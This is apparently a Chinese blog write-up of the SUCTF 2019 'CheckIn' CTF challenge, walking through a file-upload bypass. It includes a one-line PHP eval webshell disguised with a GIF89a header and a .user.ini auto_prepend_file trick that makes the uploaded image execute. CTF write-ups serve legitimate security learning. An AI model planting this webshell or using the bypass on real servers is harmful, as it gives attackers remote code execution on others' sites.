[SUCTF 2019]CheckIn 1

八块腹肌的橘猫2024-05-07 19:43

解题步骤

  1. 上传木马图片,命名为b.php
xml 复制代码 
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>

  1. bp抓包,修改数据;然后可看到上传的文件

  2. 上传.user.ini文件,内容编写如下,然后bp抓包修改文件类型

php 复制代码 
GIF89a
auto_prepend_file=b.jpg


  1. 可发现,刚刚我们上传的木马b文件被删除了,这里我测试了几遍,只要速度够快,两个文件能够同时存在,能够用蚁剑连接。


相关推荐
赵侃侃爱分享36 分钟前
AI怎么定义网络安全
人工智能·安全·web安全
上海云盾-小余2 小时前
服务器被入侵后如何快速止损?从排查到加固的应急处置全流程
网络·网络协议·tcp/ip·安全·web安全
FreeBuf_3 小时前
14000余台F5 BIG-IP暴露,高危RCE漏洞正遭活跃利用
tcp/ip·安全·web安全
Xudde.3 小时前
班级作业笔记报告0x08
笔记·学习·安全·web安全
Xudde.6 小时前
班级作业笔记报告0x09
笔记·学习·安全·web安全·php
CHICX12296 小时前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全
m0_738120726 小时前
渗透基础知识ctfshow——Web应用安全与防护(第二章)
服务器·前端·安全·web安全·php
鹅天帝7 小时前
20260407网安学习日志——序列化漏洞
前端·学习·web安全·网络安全·xss
爱思考的发菜_汽车网络信息安全7 小时前
汽车网络安全:ECC算法详细解析
安全·web安全·汽车
运维行者_7 小时前
MSP网络管理破局者:IPAM+SPM插件终结IP冲突与安全威胁
运维·服务器·开发语言·网络·安全·web安全·php
热门推荐
01GitHub 镜像站点02OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程03AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南04Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06Claude Code 未登录 使用第三方模型07Oh My Codex 快速使用指南08UV安装并设置国内源09【技术干货】Gemma 4 上手深度指南:本地多模态大模型的新基线10最新更新版本,OpenClaw v2026.4.2 深度解读剖析:Task Flow 重磅回归与安全架构的全面硬化